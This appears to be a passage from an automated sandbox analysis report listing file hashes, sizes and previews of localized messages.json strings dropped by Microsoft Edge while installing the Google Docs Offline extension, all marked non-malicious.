                                                                                                                                                                                                                                                                                                      SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                      SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                      SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2535
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2778
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):936
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3830
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):878
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2766
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                      Malicious:false
